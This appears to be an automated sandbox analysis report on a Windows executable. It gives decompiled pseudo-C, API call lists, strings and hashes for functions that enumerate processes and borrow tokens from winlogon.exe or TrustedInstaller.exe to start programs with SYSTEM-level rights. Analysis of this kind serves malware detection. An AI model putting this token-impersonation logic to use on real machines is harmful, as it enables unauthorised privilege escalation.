									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}





































                                                                                                                            0x00408533
                                                                                                                            0x00408533
                                                                                                                            0x00408536
                                                                                                                            0x0040853e
                                                                                                                            0x00408546
                                                                                                                            0x0040854d
                                                                                                                            0x00408559
                                                                                                                            0x00408563
                                                                                                                            0x00408569
                                                                                                                            0x00408572
                                                                                                                            0x00408583
                                                                                                                            0x0040858d
                                                                                                                            0x00408595
                                                                                                                            0x0040859e
                                                                                                                            0x004085a2
                                                                                                                            0x004085a6
                                                                                                                            0x004085aa
                                                                                                                            0x004085ae
                                                                                                                            0x004085b8
                                                                                                                            0x004085c1
                                                                                                                            0x004085c8
                                                                                                                            0x004085cd
                                                                                                                            0x004085cf
                                                                                                                            0x0040867f
                                                                                                                            0x00408688
                                                                                                                            0x0040868d
                                                                                                                            0x0040868f
                                                                                                                            0x00408730
                                                                                                                            0x00408735
                                                                                                                            0x00408737
                                                                                                                            0x0040873d
                                                                                                                            0x00408750
                                                                                                                            0x0040875d
                                                                                                                            0x00408763
                                                                                                                            0x00408770
                                                                                                                            0x00408775
                                                                                                                            0x00408779
                                                                                                                            0x0040878b
                                                                                                                            0x00408790
                                                                                                                            0x004087a2
                                                                                                                            0x004087aa
                                                                                                                            0x004087b8
                                                                                                                            0x004087be
                                                                                                                            0x004087c3
                                                                                                                            0x004087c9
                                                                                                                            0x004087d2
                                                                                                                            0x004087df
                                                                                                                            0x004087e3
                                                                                                                            0x004087e6
                                                                                                                            0x00408801
                                                                                                                            0x004087e8
                                                                                                                            0x004087f8
                                                                                                                            0x004087fe
                                                                                                                            0x00408811
                                                                                                                            0x00408816
                                                                                                                            0x00408816
                                                                                                                            0x0040881c
                                                                                                                            0x00408822
                                                                                                                            0x00408779
                                                                                                                            0x00408824
                                                                                                                            0x00408829
                                                                                                                            0x00408833
                                                                                                                            0x00408834
                                                                                                                            0x00408840
                                                                                                                            0x00408848
                                                                                                                            0x0040884c
                                                                                                                            0x00408850
                                                                                                                            0x00408855
                                                                                                                            0x0040885a
                                                                                                                            0x00408860
                                                                                                                            0x004088ac
                                                                                                                            0x004088b1
                                                                                                                            0x004088b3
                                                                                                                            0x004088bf
                                                                                                                            0x004088c5
                                                                                                                            0x004088cb
                                                                                                                            0x004088da
                                                                                                                            0x004088ea
                                                                                                                            0x004088ed
                                                                                                                            0x004088f8
                                                                                                                            0x004088ff
                                                                                                                            0x00408905
                                                                                                                            0x004088b5
                                                                                                                            0x004088b5
                                                                                                                            0x004088b5
                                                                                                                            0x00000000
                                                                                                                            0x00408862
                                                                                                                            0x00408862
                                                                                                                            0x0040886d
                                                                                                                            0x00408874
                                                                                                                            0x0040887b
                                                                                                                            0x00408882
                                                                                                                            0x00408889
                                                                                                                            0x00408895
                                                                                                                            0x00408897
                                                                                                                            0x00408658
                                                                                                                            0x00408658
                                                                                                                            0x0040865d
                                                                                                                            0x00408661
                                                                                                                            0x0040866a
                                                                                                                            0x00408673
                                                                                                                            0x00408678
                                                                                                                            0x00000000
                                                                                                                            0x00408678
                                                                                                                            0x00408860
                                                                                                                            0x00408695
                                                                                                                            0x00408695
                                                                                                                            0x0040869f
                                                                                                                            0x004086a2
                                                                                                                            0x004086af
                                                                                                                            0x004086a4
                                                                                                                            0x004086a7
                                                                                                                            0x004086a7
                                                                                                                            0x004086b4
                                                                                                                            0x004086bf
                                                                                                                            0x004086cb
                                                                                                                            0x004086d3
                                                                                                                            0x004086d7
                                                                                                                            0x004086db
                                                                                                                            0x004086e0
                                                                                                                            0x004086f1
                                                                                                                            0x004086f8
                                                                                                                            0x004086ff
                                                                                                                            0x00408706
                                                                                                                            0x0040870d
                                                                                                                            0x00408719
                                                                                                                            0x0040871b
                                                                                                                            0x00000000
                                                                                                                            0x0040871b
                                                                                                                            0x004085d5
                                                                                                                            0x004085da
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004085ec
                                                                                                                            0x004085ef
                                                                                                                            0x004085f6
                                                                                                                            0x004085fd
                                                                                                                            0x00408604
                                                                                                                            0x0040860b
                                                                                                                            0x00408612
                                                                                                                            0x00408616
                                                                                                                            0x00408620
                                                                                                                            0x0040862a
                                                                                                                            0x00408632
                                                                                                                            0x00408633
                                                                                                                            0x00408638
                                                                                                                            0x0040864a
                                                                                                                            0x0040864f
                                                                                                                            0x00408651
                                                                                                                            0x00000000
                                                                                                                            0x0040854f
                                                                                                                            0x0040854f
                                                                                                                            0x00408550
                                                                                                                            0x00408556
                                                                                                                            0x00408556

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                              • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                              • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                              • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                            • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                            • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                            • swscanf.MSVCRT ref: 00408620
                                                                                                                            • _wtoi.MSVCRT ref: 00408633
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                            • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                            • API String ID: 3933224404-3784219877
                                                                                                                            • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                            • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                            • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                            • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 81%
                                                                                                                            			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                            0x00401fe6
                                                                                                                            0x00401ff1
                                                                                                                            0x00401ff3
                                                                                                                            0x00401fff
                                                                                                                            0x00402002
                                                                                                                            0x004020a8
                                                                                                                            0x004020ab
                                                                                                                            0x004020f3
                                                                                                                            0x004020f6
                                                                                                                            0x00402162
                                                                                                                            0x00402165
                                                                                                                            0x004021f2
                                                                                                                            0x004021f5
                                                                                                                            0x00402235
                                                                                                                            0x00402238
                                                                                                                            0x004022be
                                                                                                                            0x0040223a
                                                                                                                            0x0040223a
                                                                                                                            0x00402240
                                                                                                                            0x0040224b
                                                                                                                            0x0040224e
                                                                                                                            0x00402251
                                                                                                                            0x00402254
                                                                                                                            0x00402259
                                                                                                                            0x0040225e
                                                                                                                            0x00402262
                                                                                                                            0x00402264
                                                                                                                            0x00402264
                                                                                                                            0x00402264
                                                                                                                            0x00402262
                                                                                                                            0x00402266
                                                                                                                            0x0040226c
                                                                                                                            0x00402271
                                                                                                                            0x00402274
                                                                                                                            0x00402276
                                                                                                                            0x0040229a
                                                                                                                            0x0040229a
                                                                                                                            0x00402278
                                                                                                                            0x00402296
                                                                                                                            0x00402296
                                                                                                                            0x0040229c
                                                                                                                            0x0040229c
                                                                                                                            0x004022c0
                                                                                                                            0x004022c2
                                                                                                                            0x004022c8
                                                                                                                            0x004022c8
                                                                                                                            0x004022c8
                                                                                                                            0x00000000
                                                                                                                            0x004022c0
                                                                                                                            0x00402201
                                                                                                                            0x00402203
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402220
                                                                                                                            0x00402225
                                                                                                                            0x00402227
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040222d
                                                                                                                            0x00000000
                                                                                                                            0x0040222d
                                                                                                                            0x00402173
                                                                                                                            0x00402179
                                                                                                                            0x0040217b
                                                                                                                            0x0040217e
                                                                                                                            0x00402183
                                                                                                                            0x00402185
                                                                                                                            0x00402188
                                                                                                                            0x0040218d
                                                                                                                            0x0040218f
                                                                                                                            0x00402192
                                                                                                                            0x004021a2
                                                                                                                            0x004021a7
                                                                                                                            0x004021a9
                                                                                                                            0x004021ac
                                                                                                                            0x004021cc
                                                                                                                            0x004021d1
                                                                                                                            0x004021d3
                                                                                                                            0x004021db
                                                                                                                            0x004021db
                                                                                                                            0x004021e1
                                                                                                                            0x004021e1
                                                                                                                            0x004021e7
                                                                                                                            0x004021e7
                                                                                                                            0x00000000
                                                                                                                            0x00402192
                                                                                                                            0x004020fe
                                                                                                                            0x00402103
                                                                                                                            0x00402105
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402111
                                                                                                                            0x00402114
                                                                                                                            0x00000000
                                                                                                                            0x00402114
                                                                                                                            0x004020ad
                                                                                                                            0x004020b4
                                                                                                                            0x004020b9
                                                                                                                            0x004020bc
                                                                                                                            0x00000000
                                                                                                                            0x004020c2
                                                                                                                            0x004020c4
                                                                                                                            0x004020ce
                                                                                                                            0x004020d0
                                                                                                                            0x004020d3
                                                                                                                            0x004020d4
                                                                                                                            0x004020d5
                                                                                                                            0x004020e6
                                                                                                                            0x004020e7
                                                                                                                            0x004020d7
                                                                                                                            0x004020d7
                                                                                                                            0x004020dd
                                                                                                                            0x004020de
                                                                                                                            0x004020df
                                                                                                                            0x004020df
                                                                                                                            0x004020ec
                                                                                                                            0x004020ef
                                                                                                                            0x00000000
                                                                                                                            0x004020ef
                                                                                                                            0x00402008
                                                                                                                            0x00402016
                                                                                                                            0x0040201d
                                                                                                                            0x0040202e
                                                                                                                            0x00402035
                                                                                                                            0x00402044
                                                                                                                            0x00402049
                                                                                                                            0x00402055
                                                                                                                            0x00402064
                                                                                                                            0x00402068
                                                                                                                            0x0040206e
                                                                                                                            0x0040208b
                                                                                                                            0x00402070
                                                                                                                            0x00402082
                                                                                                                            0x00402088
                                                                                                                            0x0040209e
                                                                                                                            0x004020a1
                                                                                                                            0x00402119
                                                                                                                            0x00402119
                                                                                                                            0x0040211b
                                                                                                                            0x0040211e
                                                                                                                            0x0040211e
                                                                                                                            0x00402149
                                                                                                                            0x00402151
                                                                                                                            0x00402151
                                                                                                                            0x00402157
                                                                                                                            0x00402157
                                                                                                                            0x004022cb
                                                                                                                            0x004022d2
                                                                                                                            0x004022d2

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 0040201D
                                                                                                                            • memset.MSVCRT ref: 00402035
                                                                                                                              • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                              • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                            • wcslen.MSVCRT ref: 00402050
                                                                                                                            • wcslen.MSVCRT ref: 0040205F
                                                                                                                            • wcslen.MSVCRT ref: 004020B4
                                                                                                                            • _wtoi.MSVCRT ref: 004020D7
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                            • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                            • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                              • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                              • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                              • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                              • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                              • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                              • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                              • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                              • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                              • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                              • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                              • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                              • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                              • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                            • wcschr.MSVCRT ref: 00402259
                                                                                                                            • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                            • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                            • API String ID: 3201562063-2355939583
                                                                                                                            • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                            • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                            • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                            • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}































                                                                                                                            0x00409609
                                                                                                                            0x0040960f
                                                                                                                            0x00409619
                                                                                                                            0x00409623
                                                                                                                            0x0040962e
                                                                                                                            0x00409633
                                                                                                                            0x00409640
                                                                                                                            0x0040964a
                                                                                                                            0x00409782
                                                                                                                            0x0040978c
                                                                                                                            0x00409793
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040965a
                                                                                                                            0x0040965f
                                                                                                                            0x00409678
                                                                                                                            0x0040967e
                                                                                                                            0x00409681
                                                                                                                            0x00409685
                                                                                                                            0x00409688
                                                                                                                            0x004096b2
                                                                                                                            0x004096bf
                                                                                                                            0x004096c6
                                                                                                                            0x004096cb
                                                                                                                            0x004096da
                                                                                                                            0x004096e6
                                                                                                                            0x0040973b
                                                                                                                            0x00409747
                                                                                                                            0x0040975f
                                                                                                                            0x00409764
                                                                                                                            0x0040976a
                                                                                                                            0x00409770
                                                                                                                            0x00409773
                                                                                                                            0x0040977d
                                                                                                                            0x00000000
                                                                                                                            0x0040977d
                                                                                                                            0x004096ee
                                                                                                                            0x004096f5
                                                                                                                            0x004096fc
                                                                                                                            0x00409704
                                                                                                                            0x0040970c
                                                                                                                            0x0040971c
                                                                                                                            0x0040971c
                                                                                                                            0x00409704
                                                                                                                            0x00409721
                                                                                                                            0x00409728
                                                                                                                            0x00409739
                                                                                                                            0x00409739
                                                                                                                            0x00000000
                                                                                                                            0x00409728
                                                                                                                            0x00409693
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004096a5
                                                                                                                            0x004096a9
                                                                                                                            0x004096ac
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004096ac
                                                                                                                            0x004097a6

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                            • memset.MSVCRT ref: 0040962E
                                                                                                                            • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                            • memset.MSVCRT ref: 004096C6
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                            • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                            • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                            • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                            • API String ID: 239888749-1740548384
                                                                                                                            • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                            • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                            • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
